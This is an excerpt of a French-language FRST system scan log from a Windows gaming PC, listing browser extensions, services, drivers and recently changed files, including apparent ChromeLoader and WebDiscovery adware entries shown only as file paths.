CHR Extension: (Slides) - C:\Users\aston\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-12-31]
CHR Extension: (Flash Video Downloader Plus) - C:\Users\aston\AppData\Local\Google\Chrome\User Data\Default\Extensions\alfnggielnhdpdamedeokgppcilgainm [2020-06-28]
CHR Extension: (Docs) - C:\Users\aston\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-12-31]
CHR Extension: (GoogleÂ Drive) - C:\Users\aston\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-25]
CHR Extension: (YouTube) - C:\Users\aston\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-12-31]
CHR Extension: (Adblock Plus - bloqueur de publicitÃ©s gratuit) - C:\Users\aston\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2021-11-24]
CHR Extension: (Sheets) - C:\Users\aston\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-12-31]
CHR Extension: (LightShot Roulette) - C:\Users\aston\AppData\Local\Google\Chrome\User Data\Default\Extensions\ggnpgmocgnboafcpdmdojkdaaoddjape [2020-06-08]
CHR Extension: (GoogleÂ Docs hors connexion) - C:\Users\aston\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-11-30]
CHR Extension: (Web Safety) - C:\Users\aston\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfhcmdonhekjhfbjmeacdjbhlfgpjabp [2021-08-08]
CHR Extension: (Paiements via le ChromeÂ WebÂ Store) - C:\Users\aston\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-02-06]
CHR Extension: (Gmail) - C:\Users\aston\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Options) - C:\Users\aston\AppData\Local [2022-01-09]
CHR Profile: C:\Users\aston\AppData\Local\Google\Chrome\User Data\Guest Profile [2020-03-20]
CHR Profile: C:\Users\aston\AppData\Local\Google\Chrome\User Data\System Profile [2020-03-20]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [caljgklbbfbcjjanaijlacgncafpegll]
CHR HKLM-x32\...\Chrome\Extension: [ccbpbkebodcjkknkfkpmfeciinhidaeh]
CHR HKLM-x32\...\Chrome\Extension: [mfhcmdonhekjhfbjmeacdjbhlfgpjabp]

Opera: 
=======
OPR Profile: C:\Users\aston\AppData\Roaming\Opera Software\Opera Stable [2021-07-06]
OPR Extension: (Rich Hints Agent) - C:\Users\aston\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2021-07-06]

==================== Services (Avec liste blanche) ===================

(Si un Ã©lÃ©ment est inclus dans le fichier fixlist.txt, il sera supprimÃ© du Registre. Le fichier ne sera pas dÃ©placÃ©, sauf s'il est inscrit sÃ©parÃ©ment.)

S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8901968 2021-10-30] (BattlEye Innovations e.K. -> )
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [12129128 2021-12-10] (Microsoft Corporation -> Microsoft Corporation)
R2 CMService; C:\Program Files (x86)\CoolerMaster\PORTAL\CMService.exe [117248 2020-03-16] () [Fichier non signÃ©]
R2 EABackgroundService; C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe [10043032 2022-01-06] (Electronic Arts, Inc. -> Electronic Arts)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [784512 2021-12-06] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
S3 EQU8_36; C:\ProgramData\EQU8\Splitgate\bin\anticheat.x64.equ8.exe [6033552 2021-08-10] (Int3 Software AB -> Int3 Software AB)
S3 GalaxyClientService; C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe [1874272 2021-03-26] (GOG Sp. z o.o. -> GOG.com)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [6840672 2021-03-26] (GOG Sp. z o.o. -> GOG.com)
R2 NahimicService; C:\WINDOWS\system32\NahimicService.exe [1888424 2021-10-08] (A-Volute SAS -> Nahimic)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2556048 2021-06-22] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3474584 2021-06-22] (Electronic Arts, Inc. -> Electronic Arts)
S3 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [2484056 2021-12-15] (Overwolf Ltd -> Overwolf LTD)
S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2017072 2021-12-15] (Rockstar Games, Inc. -> Rockstar Games)
S3 TwitchService; C:\Program Files\Common Files\Twitch\TwitchService.exe [337112 2022-01-03] (Twitch Interactive, Inc. -> )
S3 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10429808 2021-11-30] (Riot Games, Inc. -> Riot Games, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\NisSrv.exe [2876152 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe [128360 2021-12-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_44dc4eefedc0d082\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_44dc4eefedc0d082\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Pilotes (Avec liste blanche) ===================

(Si un Ã©lÃ©ment est inclus dans le fichier fixlist.txt, il sera supprimÃ© du Registre. Le fichier ne sera pas dÃ©placÃ©, sauf s'il est inscrit sÃ©parÃ©ment.)

S3 AppleKmdfFilter; C:\WINDOWS\System32\drivers\AppleKmdfFilter.sys [20032 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
R2 BlueStacksDrv; C:\Program Files\BlueStacks\BstkDrv_bgp.sys [315976 2020-10-04] (Bluestack Systems, Inc -> Bluestack System Inc.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Fichier non signÃ©]
S3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [Fichier non signÃ©]
S3 EQU8_HELPER_36; C:\WINDOWS\system32\DRIVERS\EQU8_HELPER_36.sys [38032 2021-08-16] (Int3 Software AB -> )
R1 GUBootStartup; C:\WINDOWS\System32\drivers\GUBootStartup.sys [28936 2020-02-28] (Glarysoft LTD -> Glarysoft Ltd)
R3 Nahimic_Mirroring; C:\WINDOWS\System32\drivers\Nahimic_Mirroring.sys [85616 2021-08-13] (A-Volute -> Windows (R) Win 7 DDK provider)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48552 2021-11-01] (Microsoft Windows Hardware Compatibility Publisher -> NVIDIA Corporation)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [8480608 2021-11-29] (Riot Games, Inc. -> Riot Games, Inc.)
R3 WacHidRouterPro; C:\WINDOWS\System32\drivers\wachidrouter.sys [121120 2021-10-06] (WDKTestCert dant_ppxe9ny,132750999598161733 -> Wacom Technology, Corp.)
R3 wacomrouterfilter; C:\WINDOWS\System32\drivers\wacomrouterfilter.sys [20720 2021-10-06] (WDKTestCert dant_ppxe9ny,132750999598161733 -> Wacom Technology, Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2021-12-16] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [435432 2021-12-16] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [86248 2021-12-16] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Avec liste blanche) ===================

(Si un Ã©lÃ©ment est inclus dans le fichier fixlist.txt, il sera supprimÃ© du Registre. Le fichier ne sera pas dÃ©placÃ©, sauf s'il est inscrit sÃ©parÃ©ment.)


==================== Un mois (crÃ©Ã©s) (Avec liste blanche) =========

(Si un Ã©lÃ©ment est inclus dans le fichier fixlist.txt, le fichier/dossier sera dÃ©placÃ©.)

2022-01-09 17:24 - 2022-01-09 17:24 - 000000000 ____D C:\FRST
2022-01-09 12:24 - 2022-01-09 12:24 - 000000000 ____D C:\WINDOWS\Panther
2022-01-09 11:59 - 2022-01-09 11:59 - 000000000 ____D C:\Users\aston\AppData\Local\chrome
2022-01-09 11:58 - 2022-01-09 11:58 - 000012828 _____ C:\WINDOWS\system32\Tasks\ChromeLoader
2022-01-09 00:25 - 2022-01-09 12:13 - 000000000 ____D C:\Users\aston\Downloads\YUzu
2022-01-09 00:11 - 2022-01-09 00:11 - 010408566 _____ C:\Users\aston\Downloads\YUZU DATA.rar
2022-01-09 00:10 - 2022-01-09 00:12 - 000000000 ____D C:\Users\aston\AppData\Roaming\yuzu
2022-01-09 00:09 - 2022-01-09 12:17 - 000002090 _____ C:\Users\aston\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\yuzu.lnk
2022-01-09 00:09 - 2022-01-09 00:10 - 000000000 ____D C:\Users\aston\AppData\Local\yuzu
2022-01-09 00:09 - 2022-01-09 00:09 - 000001316 _____ C:\Users\aston\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\yuzu Maintenance Tool.lnk
2022-01-09 00:07 - 2022-01-09 00:07 - 006879744 _____ C:\Users\aston\Downloads\yuzu_install.exe
2022-01-08 19:56 - 2022-01-08 19:56 - 000000675 _____ C:\Users\Public\Desktop\Metro Exodus - Enhanced Edition.lnk
2022-01-08 19:50 - 2022-01-08 21:05 - 000002336 _____ C:\WINDOWS\system32\Drivers\etc\hosts.rollback
2022-01-08 19:50 - 2018-09-15 08:31 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts.backup
2022-01-08 16:29 - 2022-01-08 16:29 - 000000000 ____D C:\Users\aston\OneDrive\Documents\Avalanche Studios
2022-01-08 15:40 - 2022-01-08 15:40 - 000510608 _____ C:\Users\aston\Downloads\Xray_Ultimate_1.18_v4.2.0.zip
2022-01-08 15:26 - 2022-01-08 15:26 - 000507183 _____ C:\Users\aston\Downloads\Sildurs fabulous shaders v1.0.zip
2022-01-08 15:26 - 2022-01-08 15:26 - 000140450 _____ C:\Users\aston\Downloads\Sildurs Vibrant Shaders v1.29 Extreme-VL.zip
2022-01-08 15:26 - 2022-01-08 15:26 - 000060416 _____ C:\Users\aston\Downloads\Enhanced Default v1.12.zip
2022-01-08 15:25 - 2022-01-08 15:25 - 000927004 _____ C:\Users\aston\Downloads\BSL_v8.1.01.zip
2022-01-08 15:23 - 2022-01-08 15:23 - 009238693 _____ C:\Users\aston\Downloads\1.18.zip
2022-01-05 22:50 - 2022-01-05 22:50 - 000082975 _____ C:\Users\aston\Downloads\La_IIe_RÃ©publique_et_le_Second_Empire.pdf
2022-01-05 22:40 - 2022-01-05 22:40 - 004689143 _____ C:\Users\aston\Downloads\DIAPO SES.pptx
2022-01-05 22:16 - 2022-01-05 22:16 - 004734571 _____ C:\Users\aston\Downloads\DIAPO NATHAN[615].pptx
2022-01-05 18:42 - 2022-01-05 22:08 - 002077817 _____ C:\Users\aston\Downloads\DIAPO NATHAN.pptx
2021-12-31 03:18 - 2021-12-31 03:18 - 000000000 ____D C:\Users\aston\AppData\Local\Rocket League
2021-12-29 13:39 - 2021-12-29 13:39 - 000000000 ____D C:\Users\aston\.config
2021-12-20 18:14 - 2021-12-20 18:14 - 009822885 _____ C:\Users\aston\OneDrive\Documents\POURQUOI_ENTEND-on_des_bruits_lors_dâun_sÃ©isme Victor et dorian.pptx
2021-12-20 18:11 - 2021-12-20 18:11 - 000000039 _____ C:\Users\aston\AppData\Local\kritadisplayrc
2021-12-20 13:19 - 2021-12-20 13:19 - 009822913 _____ C:\Users\aston\OneDrive\Documents\POURQUOI_ENTEND-on_des_bruits_lors_dâun_sÃ©isme.pptx
2021-12-19 18:55 - 2021-12-19 18:55 - 000000000 ____D C:\Users\aston\AppData\Local\MediaPlayer
2021-12-19 11:33 - 2021-12-19 12:28 - 000000000 ____D C:\Users\aston\AppData\Roaming\VLTD App Executable
2021-12-18 20:45 - 2021-12-18 20:45 - 000000000 ____D C:\Users\aston\AppData\LocalLow\Raw Fury
2021-12-18 20:45 - 2021-12-18 20:45 - 000000000 ____D C:\Users\aston\AppData\LocalLow\Oskar Stalberg
2021-12-17 20:34 - 2021-12-17 20:34 - 000000000 ____D C:\WINDOWS\SystemTemp
2021-12-14 20:36 - 2021-12-14 20:36 - 000272384 _____ C:\WINDOWS\system32\TpmTool.exe
2021-12-14 20:36 - 2021-12-14 20:36 - 000223744 _____ C:\WINDOWS\SysWOW64\TpmTool.exe
2021-12-14 20:36 - 2021-12-14 20:36 - 000162816 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-12-14 20:36 - 2021-12-14 20:36 - 000011979 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-12-14 20:27 - 2021-12-14 20:27 - 000000000 ___HD C:\$WinREAgent
2021-12-12 13:03 - 2022-01-05 19:34 - 000003588 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1941571944-215128514-3644642321-1001

==================== Un mois (modifiÃ©s) ==================

(Si un Ã©lÃ©ment est inclus dans le fichier fixlist.txt, le fichier/dossier sera dÃ©placÃ©.)

2022-01-09 17:25 - 2019-12-31 17:58 - 000000000 ____D C:\Users\aston\AppData\Roaming\Discord
2022-01-09 17:23 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-01-09 16:55 - 2019-12-31 19:10 - 000000000 ____D C:\Program Files (x86)\Google
2022-01-09 16:53 - 2021-06-08 16:07 - 001770906 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-01-09 16:53 - 2019-12-07 15:49 - 000791756 _____ C:\WINDOWS\system32\perfh00C.dat
2022-01-09 16:53 - 2019-12-07 15:49 - 000149922 _____ C:\WINDOWS\system32\perfc00C.dat
2022-01-09 16:53 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2022-01-09 16:51 - 2021-07-07 13:00 - 000000000 ___HD C:\Users\aston\Downloads\.opera
2022-01-09 16:51 - 2021-07-07 13:00 - 000000000 ___HD C:\Users\aston\.opera
2022-01-09 16:49 - 2020-07-04 08:43 - 000000001 _____ C:\WINDOWS\vgkbootstatus.dat
2022-01-09 16:47 - 2021-04-21 00:31 - 000000000 ____D C:\Users\aston\AppData\Roaming\Twitch
2022-01-09 16:47 - 2020-12-30 00:13 - 000000000 ____D C:\Users\aston\AppData\Local\Overwolf
2022-01-09 16:46 - 2021-11-06 17:04 - 000000000 ____D C:\Users\aston\AppData\Roaming\WTablet
2022-01-09 16:46 - 2021-07-06 19:27 - 000000000 ____D C:\Users\aston\AppData\Local\Discord
2022-01-09 16:46 - 2020-09-27 08:51 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-01-09 16:46 - 2019-12-30 11:44 - 000000000 ____D C:\ProgramData\NVIDIA
2022-01-09 16:46 - 2019-12-30 10:55 - 000000000 ___RD C:\Users\aston\OneDrive
2022-01-09 16:46 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState
2022-01-09 16:45 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2022-01-09 16:40 - 2020-06-10 15:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2022-01-09 16:40 - 2020-06-10 15:41 - 000000000 ____D C:\Program Files (x86)\Java
2022-01-09 14:03 - 2020-09-27 06:51 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-01-09 13:25 - 2020-01-22 20:39 - 000000000 ____D C:\Users\aston\OneDrive\Documents\Fl Studio 12
2022-01-09 12:42 - 2019-12-31 09:36 - 000000000 ____D C:\Users\aston\AppData\Local\D3DSCache
2022-01-09 03:24 - 2021-06-08 16:01 - 000000000 ____D C:\Users\aston
2022-01-09 03:02 - 2021-08-10 11:25 - 000000000 ____D C:\Users\aston\AppData\Roaming\qBittorrent
2022-01-08 21:05 - 2020-01-10 23:05 - 000000000 ____D C:\Users\aston\AppData\Local\CrashDumps
2022-01-08 19:51 - 2020-02-28 15:57 - 000000000 ____D C:\Program Files (x86)\Glary Utilities 5
2022-01-08 18:17 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-01-08 18:11 - 2019-12-30 10:53 - 000000000 ____D C:\Users\aston\AppData\Local\Packages
2022-01-08 18:11 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-01-08 17:37 - 2020-09-27 08:55 - 000000000 ____D C:\ProgramData\Packages
2022-01-08 15:51 - 2020-06-10 15:43 - 000000000 ____D C:\Users\aston\AppData\Roaming\.minecraft
2022-01-08 15:51 - 2020-02-07 21:51 - 000000000 ____D C:\Users\aston\AppData\Local\Ubisoft Game Launcher
2022-01-08 15:13 - 2020-06-10 15:43 - 000000000 ____D C:\Users\aston\AppData\Roaming\.tlauncher
2022-01-08 13:39 - 2020-02-28 17:01 - 000000000 ____D C:\ProgramData\Riot Games
2022-01-08 12:51 - 2021-07-06 19:31 - 000000000 ____D C:\Users\aston\AppData\Local\Battle.net
2022-01-08 10:25 - 2020-09-27 08:54 - 000002442 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-01-08 10:25 - 2020-09-27 08:54 - 000002280 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-01-07 23:48 - 2019-12-30 11:05 - 000000000 ____D C:\Program Files (x86)\Steam
2022-01-07 15:47 - 2019-12-31 13:32 - 000000000 ____D C:\Users\aston\OneDrive\Documents\My Games
2022-01-07 11:24 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2022-01-07 11:17 - 2019-12-30 10:59 - 000000000 ____D C:\Users\aston\AppData\Local\PlaceholderTileLogoFolder
2022-01-05 19:34 - 2021-06-08 16:07 - 000003378 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1941571944-215128514-3644642321-1001
2022-01-05 19:34 - 2021-06-08 16:01 - 000002417 _____ C:\Users\aston\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-01-05 18:37 - 2020-05-12 16:57 - 000000000 ____D C:\Users\aston\OneDrive\Documents\Audacity
2022-01-05 14:20 - 2019-12-30 11:44 - 000000000 ____D C:\Users\aston\AppData\Local\NVIDIA Corporation
2022-01-05 14:17 - 2019-12-30 11:44 - 000001443 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2022-01-05 14:17 - 2019-12-30 11:44 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2022-01-05 14:16 - 2021-06-08 16:07 - 000004308 _____ C:\WINDOWS\system32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-01-05 14:16 - 2021-06-08 16:07 - 000003976 _____ C:\WINDOWS\system32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-01-05 14:16 - 2021-06-08 16:07 - 000003940 _____ C:\WINDOWS\system32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-01-05 14:16 - 2021-06-08 16:07 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-01-05 14:16 - 2021-06-08 16:07 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-01-05 14:16 - 2021-06-08 16:07 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-01-05 14:16 - 2021-06-08 16:07 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-01-05 14:16 - 2019-12-30 11:44 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2022-01-05 14:16 - 2019-12-30 11:42 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2022-01-05 14:15 - 2021-06-08 16:07 - 000003894 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-01-05 14:15 - 2021-06-08 16:07 - 000003654 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-01-03 21:04 - 2021-08-11 10:14 - 000000000 ____D C:\Users\aston\AppData\Roaming\Twitch Studio
2022-01-03 21:04 - 2021-08-11 10:14 - 000000000 ____D C:\Program Files\Common Files\Twitch
2022-01-01 21:49 - 2021-11-06 19:37 - 000001064 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop 2020.lnk
2022-01-01 21:49 - 2021-11-03 11:50 - 000002367 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator 2021.lnk
2022-01-01 21:49 - 2021-08-29 21:54 - 000002487 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel.lnk
2022-01-01 21:49 - 2021-01-06 18:46 - 000002081 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BlueStacks Multi-Instance Manager.lnk
2022-01-01 21:49 - 2021-01-06 18:46 - 000001920 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BlueStacks.lnk
2022-01-01 21:49 - 2020-05-12 16:52 - 000001088 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audacity.lnk
2022-01-01 21:49 - 2020-03-11 19:20 - 000013586 _____ C:\ProgramData\DisplaySessionContainer13.log_backup1
2022-01-01 21:49 - 2020-03-10 22:33 - 000011877 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1
2022-01-01 21:49 - 2020-03-10 19:59 - 000012263 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1
2022-01-01 21:49 - 2020-03-09 22:25 - 000013782 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2022-01-01 21:49 - 2020-02-28 15:58 - 000001161 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2022-01-01 21:49 - 2020-02-24 17:29 - 000000731 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Assistant Mise Ã  jour de Windows 10.lnk
2022-01-01 21:49 - 2019-12-31 09:44 - 000001110 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Product Verification Tool.lnk
2022-01-01 21:49 - 2019-12-31 09:34 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2022-01-01 21:49 - 2019-12-31 09:31 - 000011797 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2021-12-31 02:02 - 2020-03-29 23:37 - 000013507 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1
2021-12-29 21:29 - 2020-02-28 17:01 - 000000000 ____D C:\Riot Games
2021-12-25 10:23 - 2020-06-10 15:41 - 000164696 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2021-12-25 01:38 - 2020-12-30 12:31 - 000000000 ____D C:\Program Files (x86)\Overwolf
2021-12-20 18:11 - 2021-11-07 21:46 - 000000000 ____D C:\Users\aston\OneDrive\Documents\Dessin Digital
2021-12-20 18:11 - 2021-11-06 22:00 - 000020007 _____ C:\Users\aston\AppData\Local\kritarc
2021-12-20 13:19 - 2019-12-31 19:14 - 000000000 ____D C:\Users\aston\OneDrive\Documents\Call of Duty Modern Warfare
2021-12-19 22:16 - 2021-08-29 21:51 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2021-12-18 11:03 - 2020-04-03 22:48 - 000000000 ____D C:\ProgramData\A-Volute
2021-12-18 11:00 - 2021-07-06 19:30 - 000000000 ____D C:\Program Files (x86)\Battle.net
2021-12-17 20:35 - 2020-09-27 06:51 - 000340624 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-12-17 20:34 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-12-17 20:34 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-12-17 20:34 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-12-17 20:34 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-12-17 20:34 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2021-12-17 20:34 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2021-12-17 20:34 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2021-12-17 20:34 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2021-12-17 20:34 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-12-17 20:34 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-12-16 20:24 - 2021-11-21 18:24 - 000116200 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamelaunchhelper.dll
2021-12-16 20:24 - 2020-05-21 07:30 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingtcuihelpers.dll
2021-12-16 20:24 - 2020-02-28 11:31 - 002225640 _____ (Microsoft Corporation) C:\WINDOWS\system32\xgameruntime.dll
2021-12-16 20:24 - 2020-02-28 11:31 - 000333288 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameplatformservices.dll
2021-12-16 20:24 - 2020-02-28 11:31 - 000217536 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamingservicesproxy.dll
2021-12-16 20:24 - 2020-02-28 11:31 - 000197048 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameconfighelper.dll
2021-12-16 20:24 - 2020-02-28 11:31 - 000062952 _____ (Microsoft Corporation) C:\WINDOWS\system32\gamemodcontrol.exe
2021-12-16 19:01 - 2020-09-27 08:51 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2021-12-15 17:04 - 2020-05-21 11:17 - 000000000 ____D C:\Users\aston\AppData\Local\Rockstar Games
2021-12-15 17:02 - 2020-05-21 11:16 - 000000000 ____D C:\Program Files (x86)\Rockstar Games
2021-12-15 17:02 - 2020-05-21 11:15 - 000000000 ____D C:\Program Files\Rockstar Games
2021-12-15 14:54 - 2021-04-20 23:32 - 000000000 ____D C:\Program Files\EA Games
2021-12-14 20:39 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-12-14 20:26 - 2019-12-31 09:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-12-14 20:25 - 2019-12-31 09:43 - 137938848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-12-12 13:04 - 2021-07-01 21:29 - 000003540 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d75c77af6d1701
2021-12-12 13:04 - 2020-09-27 08:53 - 000003634 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA

==================== Fichiers Ã  la racine de certains dossiers ========

2020-01-02 18:36 - 2020-01-02 18:36 - 1629584122 _____ () C:\Program Files\Totally.Accurate.Battle.Simulator.v0.8.7.rar
2020-11-27 18:51 - 2020-11-18 00:08 - 000000064 _____ () C:\Users\aston\AppData\Roaming\auth.txt
2020-07-11 17:59 - 2020-07-11 17:59 - 000000000 _____ () C:\Users\aston\AppData\Roaming\file
2020-07-11 17:59 - 2020-07-11 17:59 - 001178960 _____ (WebDiscover Media                                           ) C:\Users\aston\AppData\Roaming\WebDiscovery_setup.exe
2021-11-06 22:00 - 2021-12-20 12:30 - 000001600 _____ () C:\Users\aston\AppData\Local\krita-sysinfo.log
2021-11-06 22:00 - 2021-12-20 18:11 - 000034289 _____ () C:\Users\aston\AppData\Local\krita.log
2021-12-20 18:11 - 2021-12-20 18:11 - 000000039 _____ () C:\Users\aston\AppData\Local\kritadisplayrc
2021-11-06 22:00 - 2021-12-20 18:11 - 000020007 _____ () C:\Users\aston\AppData\Local\kritarc
